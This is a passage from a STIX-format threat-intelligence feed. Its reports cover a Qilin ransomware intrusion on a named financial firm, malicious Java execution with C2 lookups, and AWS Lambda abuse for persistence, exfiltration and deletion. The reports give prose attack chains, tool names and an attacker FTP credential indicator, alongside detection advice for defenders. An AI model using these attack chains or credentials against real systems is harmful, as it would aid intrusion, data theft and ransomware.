\"EDRSandBlast\" to bypass security.\n3.  **Credential Access**: Harvesting credentials using tools like \"Mimikatz\" or leveraging \"OS Credential Dumping: LSASS Memory\".\n4.  **Discovery \u0026 Lateral Movement**: Mapping the network with tools such as \"Nmap\" and moving across systems using \"Remote Services\" like \"PsExec\" or \"WinRM\".\n5.  **Collection \u0026 Exfiltration**: Gathering sensitive data from various systems and exfiltrating it to attacker-controlled infrastructure, potentially via \"EasyUpload.io\" or \"MEGA\" or over FTP using credentials like `dataShare:2bTWYKNn7aK7Rqp9mnv3`.\n6.  **Impact**: Deploying the Golang-based ransomware payload to encrypt systems, accompanied by \"Data Encrypted for Impact\" and \"Inhibit System Recovery\" actions, including dropping ransom notes like \"DtMXQFOCos-RECOVER-README.txt\".\n\n## Impact\n\nThe impact of a Qilin ransomware attack on a Financial Services organization like www.tqfinancials.com includes severe operational disruption, potential data breaches due to double extortion tactics, and significant financial losses from downtime and recovery efforts. While specific data stolen for this victim is not detailed, Qilin's standard operating procedure involves data exfiltration, posing risks of regulatory fines, reputational damage, and loss of customer trust. The group has a history of impacting a wide range of sectors, with Manufacturing (301 victims), Business Services (262), and Technology (178) among its top targets, indicating its capability to severely compromise diverse organizations.\n\n## Recommendation\n\n*   Deploy the provided IOCs (MD5 hashes, IP addresses, FTP URLs) to your network perimeter defenses (firewall, IDS/IPS, DNS filters) and endpoint detection and response (EDR) solutions to block known Qilin infrastructure.\n*   Enable comprehensive logging for process creation, network connections, and PowerShell activity (log source: process_creation) to detect the execution of tools like Mimikatz, Cobalt Strike, Nmap, and PsExec.\n*   Implement and enforce strong access controls and multi-factor authentication (MFA) across all critical systems to mitigate credential compromise and lateral movement.\n*   Regularly patch and update all public-facing applications and systems to remediate known vulnerabilities that could be leveraged for initial access, as Qilin has been observed to exploit public-facing applications.\n*   Deploy robust endpoint detection rules such as \"Detect Mimikatz Credential Dumping Activity\" and \"Detect Common Cobalt Strike Beacon Processes\" to identify and block the execution of known Qilin tools and TTPs.\n",
      "published": "2026-07-03T19:06:40Z",
      "labels": [
        "ransomware",
        "double-extortion",
        "financial-services",
        "qilin",
        "golang"
      ],
      "object_refs": [
        "indicator--2e138659-726d-5791-85b9-adab26689a12",
        "indicator--2751bb83-88a1-5e8b-b3de-af2688902df7",
        "indicator--29cdef56-d7d1-5686-98d5-038079777afd",
        "indicator--3aa9a81d-f663-5a5a-93ca-bf91c8eb9822",
        "indicator--deb70478-f06f-5143-ade0-4209332787a1",
        "indicator--f5689214-af5d-56d7-9520-df1578a0aea5",
        "indicator--687d76d9-8d0e-5f1f-8e12-cf797fd6dd14",
        "indicator--5cf33e92-dd8c-57b2-9a80-7276d9704a69",
        "indicator--80d8251f-d02d-56d8-a427-56cb419a53e1",
        "indicator--138d4ac3-bd90-5655-ba98-c34824f84920",
        "indicator--6da94cf8-e5f1-5b35-b1b9-f6a8d814ce8b",
        "indicator--6d889700-4861-53d5-9d55-659263c2c564",
        "indicator--9dbbd926-62d5-5893-a132-26506570c1d8",
        "indicator--10092bd3-821c-546e-a785-5118b8a486b5",
        "indicator--2d8ab146-2217-5cdf-84d9-e3d187a9b24d",
        "indicator--603e100e-de95-55c2-8ae1-14b79ae32f8f",
        "indicator--695dca45-0557-595d-92fe-95e2d46511b8",
        "indicator--a2d62e4a-f3b5-5451-af3b-c7158760a397",
        "indicator--f60df4d4-e658-5350-aa54-e855a329a0fb",
        "indicator--b1a2f547-f868-51e4-9cb0-8100299a7bf4",
        "indicator--39a6a47d-3f95-5d38-aa73-f6ae444288bf",
        "indicator--8eff4baa-801d-5bcb-9823-2f7c2cf8e34f",
        "indicator--4170b343-6458-528b-9c46-b5f08cfee4c0",
        "indicator--210a832f-a140-5371-994b-8ff3c497bffe",
        "indicator--651cc705-df00-53f0-8183-8783d8180ccf",
        "indicator--01e2c23e-b072-5e6f-aea0-92e81145c10a",
        "indicator--fc4921dd-4e62-527f-b711-0d6e44bc6f19",
        "indicator--bc268fae-2637-5646-9cbd-fd73e6327b18",
        "indicator--1f7f491c-365b-51a3-a1dc-b5678f9066b7",
        "indicator--1e6fc5f6-fa7b-530b-bd5d-e41915f2c745",
        "indicator--af199930-f9bb-5550-8a52-b4b4431b9615",
        "indicator--72032c37-f542-5a3a-86cc-1fd4d1eb4c0c",
        "indicator--79b152ff-e8c2-5901-ba87-327500a83c1a",
        "indicator--e8f6dfdc-b6c7-52d7-9f59-338953dfd7be",
        "indicator--53c9734c-1343-54d5-9a64-323f3a3c0435",
        "indicator--fa219086-0324-511d-947c-f80066c209cc",
        "indicator--f6addb40-eb49-5e05-98fc-8039c3f602a2",
        "indicator--b51fbe50-d845-580f-828b-c10e8e0c5029",
        "indicator--60b3ccfd-1141-5bb4-bca4-f38649f6acc5",
        "indicator--edc98aac-3934-5ef6-a1fa-94a79d8693dd",
        "indicator--b8632b5d-d764-5ffa-b6a6-311634fb12ce",
        "indicator--4bf22439-9936-57dc-9393-599e7ab81077",
        "indicator--2b28b390-44da-57a5-b84c-7475af6f15b3",
        "indicator--d2c27e33-a796-5aab-bb06-df5c2d76d057",
        "indicator--1f773f36-e1be-543a-a12c-e2f6b3c7105c",
        "indicator--51cf8a7e-68c5-5080-ab86-aff4ad685449",
        "indicator--6604dae4-b6ae-5ecb-a032-e2b6a6ba7567",
        "indicator--4c572a30-2af9-5fce-b55a-14782d433160",
        "indicator--fd48eec0-b429-5dc0-9ab7-a2cc7046bdc9",
        "indicator--9c966cfa-4461-5e06-9c11-3212afb7dc47",
        "indicator--6ad856fd-6fb1-521f-996c-d1c76c88eda1",
        "indicator--04431f9b-e5bf-5b75-a0f6-032509fae207",
        "indicator--5f0885b8-d3f6-5c06-8776-711dc19b2ed0",
        "indicator--3dbaf54b-51af-5b66-9b71-c849b6f38303",
        "indicator--c95b3912-73d9-5d3e-be27-a028cdc5a414",
        "indicator--e4ad2db4-b621-55cb-8205-f49be432f9e4",
        "indicator--cfd27484-d4f1-5c02-a93f-0625ecaeee83",
        "indicator--a5569c74-3fb8-592e-93af-0f83f2c4b918",
        "indicator--a31c0d28-2857-551f-b1b9-f9b6adf3e6a7",
        "indicator--793baf3b-6e65-565e-af6d-d54e9b82ab84",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
        "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
        "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
        "attack-pattern--fad764e9-fecc-5d91-b223-3a136fa315e1",
        "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
        "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
        "threat-actor--be75d040-48f9-503f-902a-7fb62b161321"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.ransomware.live/group/qilin"
        },
        {
          "source_name": "reference",
          "url": "https://www.secureworks.com/research/threat-profiles/gold-feather"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/24/c/agenda-ransomware-propagates-to-vcenters-and-esxi-via-custom-pow.html"
        },
        {
          "source_name": "reference",
          "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc3944-sms-phishing-sim-swapping-ransomware/"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5861365f-fd32-508d-b026-7478f69bb04e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8661273-bd08-5f08-9581-7438029ffa8f",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3dc32878-b3a9-5aaa-a1c8-14890b8d6f11",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8661273-bd08-5f08-9581-7438029ffa8f",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fff917c9-2872-5b5c-8dfa-27bbaf0595cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8661273-bd08-5f08-9581-7438029ffa8f",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b8661273-bd08-5f08-9581-7438029ffa8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Java Execution from User-Writable Paths with DNS Lookup",
      "description": "## Overview\n\nAdversaries are known to deploy malicious Java applications (JARs or classpath-based applications) to Windows systems, often by dropping them into user-writable locations such as user profiles, `ProgramData`, or the `Windows\\Temp` directory. These applications are then executed using `javaw.exe`, typically with arguments like `-jar` or `-cp` (classpath). The threat identified involves such an execution immediately followed by an outbound DNS lookup, indicating an attempt to establish command and control (C2) infrastructure. This technique allows attackers to bypass application control mechanisms that primarily focus on native Windows executables, as `javaw.exe` itself is a legitimate binary. The timing is critical, focusing on `javaw.exe` processes that were recently created or modified, suggesting a staged payload.\n\n## Attack Chain\n\n1.  **Initial Access:** (Unspecified by the detection rule, but assumed) An attacker gains initial access to a Windows system through various means (e.g., phishing, exploit of a vulnerable service, compromised credentials).\n2.  **Payload Staging:** A malicious Java payload (e.g., a `.jar` file or a collection of Java classes) is dropped onto the compromised system into a user-writable directory like `C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp`, `C:\\ProgramData\\`, or `C:\\Windows\\Temp\\`.\n3.  **Execution from Suspicious Path:** The attacker executes the `javaw.exe` process from one of these user-writable locations.\n4.  **Java Application Launch:** The `javaw.exe` process is launched with specific arguments, such as `-jar malicious.jar` or `-cp \u003cclasspath\u003e MainClass`, to run the staged malicious Java application.\n5.  **Command and Control (C2) Initiation:** The malicious Java application immediately attempts to perform a DNS lookup, aiming to resolve the IP address of its command and control server.\n6.  **Establishing C2 Channel:** Upon successful DNS resolution, the malicious application attempts to establish a communication channel with the C2 server to receive further commands or exfiltrate data.\n7.  **Impact (Further Compromise):** The established C2 channel enables the attacker to perform further actions, including data exfiltration, deploying additional malware, or maintaining persistence.\n\n## Impact\n\nSuccessful exploitation allows attackers to establish a covert command and control channel, giving them persistent access to the compromised system. This can lead to unauthorized data exfiltration, further malware deployment (e.g., ransomware, infostealers), lateral movement within the network, and full system compromise. The ability to execute malicious code via a legitimate Java runtime from user-writable locations makes this technique difficult to detect for organizations relying solely on traditional application whitelisting and can result in significant financial, reputational, and operational damage.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule for \"Suspicious Java Execution from User-Writable Paths\" to your SIEM/EDR and tune it for your environment.\n*   Review `process.executable`, `process.command_line`, and `process.args` for any alerts generated by the Sigma rule to identify the specific JAR or classpath targeted and its legitimacy.\n*   Enable Sysmon process-creation and DNS query logging to correlate `javaw.exe` processes with subsequent DNS lookups, mirroring the correlation logic described in the original detection rule.\n*   Inspect parent processes of `javaw.exe` detections to identify the initial delivery mechanism (e.g., archive extraction, script execution) that dropped the Java payload.\n*   Investigate `dns.question.name` and `dns.resolved_ip` for suspicious DNS queries originating from `javaw.exe` processes.\n",
      "published": "2026-07-03T16:34:39Z",
      "labels": [
        "java",
        "execution",
        "command-and-control",
        "windows",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_java_dropped_jar_immediate_dns_lookup.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Event Triggered Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1546",
          "url": "https://attack.mitre.org/techniques/T1546"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c688c62e-e9ef-5dd4-84a6-84dc5fd80941",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81dc5862-ead7-599e-972f-171f1f77ef04",
      "target_ref": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Serverless Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1648",
          "url": "https://attack.mitre.org/techniques/T1648"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--22b7bf43-0566-5dbf-b050-54a3045eb004",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81dc5862-ead7-599e-972f-171f1f77ef04",
      "target_ref": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Cloud Compute Infrastructure",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1578",
          "url": "https://attack.mitre.org/techniques/T1578"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9a59c61-6e25-56b3-b7b9-9e7708209786",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81dc5862-ead7-599e-972f-171f1f77ef04",
      "target_ref": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--81dc5862-ead7-599e-972f-171f1f77ef04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Event Source Mapping Abuse for Persistence and Data Exfiltration",
      "description": "## Overview\n\nAdversaries possessing `lambda:CreateEventSourceMapping` permissions can abuse this AWS functionality to establish persistent access and facilitate data exfiltration within compromised AWS environments. This technique involves linking an event source, such as an Amazon SQS queue, Amazon Kinesis stream, DynamoDB stream, Amazon MSK, self-managed Apache Kafka topic, or Amazon MQ broker, to a malicious Lambda function. Once configured, the Lambda function is automatically invoked whenever new records arrive at the event source. This grants the attacker durable execution capabilities without requiring further interactive activity, allowing for continuous data siphoning or maintaining a foothold. This method offers a stealthy way to achieve persistence, as the event-driven nature can bypass traditional interactive session monitoring. This threat emphasizes the need for vigilant monitoring of Lambda configuration changes and strict permission management.\n\n## Attack Chain\n\n1.  **Initial Access**: An adversary gains initial access to an AWS account, potentially through compromised credentials or exploitation of a vulnerable application.\n2.  **Privilege Escalation/Reconnaissance**: The adversary identifies or escalates privileges to a role with `lambda:CreateEventSourceMapping` permissions and `lambda:CreateFunction`/`lambda:UpdateFunctionCode` or similar permissions to deploy/modify Lambda functions.\n3.  **Deploy Malicious Lambda Function**: The adversary deploys a new Lambda function or modifies an existing one to include malicious code designed for persistence or data exfiltration.\n4.  **Identify Sensitive Event Source**: The adversary identifies an existing event source (e.g., an Amazon SQS queue, Kinesis stream, or DynamoDB stream) containing sensitive data or frequently processed events.\n5.  **Create Event Source Mapping**: Using `lambda:CreateEventSourceMapping`, the adversary creates a mapping connecting the identified sensitive event source to their malicious Lambda function.\n6.  **Event Triggered Execution**: As new records arrive in the event source, the malicious Lambda function is automatically invoked in the background.\n7.  **Persistence/Data Exfiltration**: The malicious Lambda function executes, maintaining persistence by processing future events, or exfiltrating sensitive data from the event stream to an attacker-controlled destination.\n8.  **Obfuscation**: The adversary may attempt to obscure the purpose of the mapping or blend it with legitimate system activity to avoid detection.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to severe consequences, including continuous data exfiltration of sensitive information processed by the compromised AWS environment. For instance, if an SQS queue handling customer data or a Kinesis stream processing financial transactions is mapped, adversaries can silently siphon this data over an extended period. This method establishes a highly stealthy and durable persistence mechanism, making it difficult for defenders to detect and eradicate. The event-driven nature of Lambda functions also means the malicious code executes autonomously, requiring minimal further attacker interaction, thus reducing the chances of interactive C2 detection.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"AWS Lambda Event Source Mapping Creation\" in this brief to your SIEM and tune for your environment to detect suspicious `CreateEventSourceMapping` calls.\n*   Restrict `lambda:CreateEventSourceMapping` permissions to only trusted roles and automated deployment pipelines, referencing the AWS documentation on API permissions.\n*   Investigate all alerts from the \"AWS Lambda Event Source Mapping Creation\" rule, paying close attention to `aws.cloudtrail.user_identity.arn`, `functionName`, and `eventSourceArn` to determine legitimacy.\n*   Regularly audit existing AWS Lambda event source mappings to identify any unauthorized or suspicious configurations, focusing on the target function and event source involved.\n",
      "published": "2026-07-03T16:18:26Z",
      "labels": [
        "cloud",
        "aws",
        "persistence",
        "execution",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
        "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
        "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/invocation-eventsourcemapping.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/api/API_CreateEventSourceMapping.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b8ad752-2cd0-53ab-a3ac-9e970609bb54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0317416e-db9b-5ecb-b9fd-0c5a074c0130",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Service Stop",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1489",
          "url": "https://attack.mitre.org/techniques/T1489"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2c162ba-5abf-5d90-9a88-35e39e429669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0317416e-db9b-5ecb-b9fd-0c5a074c0130",
      "target_ref": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0317416e-db9b-5ecb-b9fd-0c5a074c0130",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Function Deletion",
      "description": "## Overview\n\nThis brief details the potential malicious deletion of AWS Lambda functions, a critical cloud impact technique. Threat actors, after gaining unauthorized access to an AWS environment, may delete Lambda functions to achieve several objectives: disrupt critical business operations and automated workflows, destroy attacker-deployed backdoors to remove evidence of their activities, or inhibit incident response by eliminating essential components of the victim's infrastructure. Such deletions are destructive and often irreversible without meticulous redeployment, making them a significant concern for defenders. While legitimate deletions occur during application decommissioning or infrastructure-as-code cycles, unauthorized deletions represent a significant compromise and indicate a severe impact on the targeted organization's cloud resources and operational continuity.\n\n## Impact\n\nThe unauthorized deletion of AWS Lambda functions can lead to severe operational disruptions, causing outages for serverless applications, breaking automated workflows, and rendering essential services inoperable. If attackers delete functions that were part of their command and control infrastructure or persistence mechanisms, it serves to destroy evidence of their presence, complicating forensic analysis and incident recovery efforts. Furthermore, the deletion of critical infrastructure components or security-related functions can actively inhibit incident response teams from effectively containing or remediating a breach, prolonging the attacker's dwell time and increasing potential damages.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM to detect `DeleteFunction` calls in AWS CloudTrail logs and ensure immediate alerting for unauthorized activity.\n*   Investigate the `aws.cloudtrail.user_identity.arn`, `source.ip`, and `user_agent.original` fields from the Sigma rule's log source to identify the principal performing the deletion and the method used.\n*   Inspect `aws.cloudtrail.request_parameters.functionName` (as seen in the rule's positive test data) to understand which specific function was deleted and its associated application or environment.\n*   Correlate `aws.cloudtrail` events with your organization's change management records to determine if a deletion aligns with an approved maintenance or deployment window.\n*   Implement filtering within your SIEM for known and approved deployment roles or CI/CD pipelines (e.g., specific `aws.cloudtrail.user_identity.arn` values) that legitimately perform Lambda function deletions to reduce false positives.\n*   If an unauthorized deletion is confirmed, restore the affected Lambda function from a known-good source or infrastructure-as-code definition and verify its configuration and execution role.\n*   Rotate or restrict credentials for the compromised principal if illicit activity is suspected, and enforce the principle of least privilege by limiting `lambda:DeleteFunction` permissions to a minimal set of trusted roles.\n",
      "published": "2026-07-03T16:17:38Z",
      "labels": [
        "cloud",
        "aws",
        "lambda",
        "impact",
        "data-destruction",
        "service-stop"
      ],
      "object_refs": [
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/api/API_DeleteFunction.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Serverless Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1648",
          "url": "https://attack.mitre.org/techniques/T1648"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dbd19e38-db0f-5d44-91ea-246a9b93b0fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4fbd7a9b-74eb-525e-a1ad-9f6a9c30aeb3",
      "target_ref": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Cloud Compute Infrastructure",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1578",
          "url": "https://attack.mitre.org/techniques/T1578"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ede98af5-5ba2-5161-aead-f0cbc20c9d3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4fbd7a9b-74eb-525e-a1ad-9f6a9c30aeb3",
      "target_ref": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4fbd7a9b-74eb-525e-a1ad-9f6a9c30aeb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Layer Shared Externally",
      "description": "## Overview\n\nThis threat focuses on the malicious or accidental configuration change of an AWS Lambda layer's permission policy, detected when an entity modifies permissions to grant access to external AWS accounts, entire AWS Organizations, or even the public. The primary mechanism for this action is the `AddLayerVersionPermission` API call. This configuration allows other entities to utilize the code and dependencies packaged within the Lambda layer. Such external sharing, especially with the public, presents a significant risk of exposing proprietary code, sensitive data, or embedded secrets. Furthermore, it creates a potential supply-chain attack vector, where compromised or malicious layers could inject attacker-influenced code into functions that reference them, impacting their runtime integrity and leading to further compromise. While legitimate cross-account sharing can occur, public or broad external sharing warrants immediate and thorough investigation due to its severe security implications.\n\n## Attack Chain\n\n[Omitted - The source describes a specific configuration change and its potential implications, not a multi-stage attack chain.]\n\n## Impact\n\nSuccessful external sharing of an AWS Lambda layer can result in the direct exposure and leakage of an organization's proprietary code and sensitive data, including API keys, database credentials, or other secrets embedded within the layer. If exploited as a supply-chain vector, an attacker could introduce malicious code into functions referencing the compromised layer, leading to various impacts such as unauthorized data exfiltration, remote code execution (RCE) within the function's execution environment, denial of service, or further lateral movement within the cloud environment. The broadness of access granted (e.g., to the public or an entire organization) directly correlates with the potential number of impacted entities and the scope of information exposure.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to detect `AddLayerVersionPermission` calls in your AWS CloudTrail logs, particularly those granting public or external account access.\n*   Investigate all instances of `AddLayerVersionPermission` where the `principal` in `aws.cloudtrail.request_parameters` is `*` (public) or an external AWS account ID.\n*   Validate the `layerName` and the granted `principal` against approved sharing practices for your organization, as noted in the `false_positives` section.\n*   If unauthorized sharing is detected, immediately remove the layer permission using the `RemoveLayerVersionPermission` API call and rotate any secrets that may have been exposed within the layer.\n*   Restrict the `lambda:AddLayerVersionPermission` IAM permission to a limited set of trusted roles and principals to reduce the attack surface.\n",
      "published": "2026-07-03T16:16:42Z",
      "labels": [
        "cloud",
        "aws",
        "lambda",
        "supply-chain",
        "misconfiguration",
        "data-leakage"
      ],
      "object_refs": [
        "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
        "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/api/API_AddLayerVersionPermission.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fdba0985-c591-5607-b3a4-c129bca0785e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
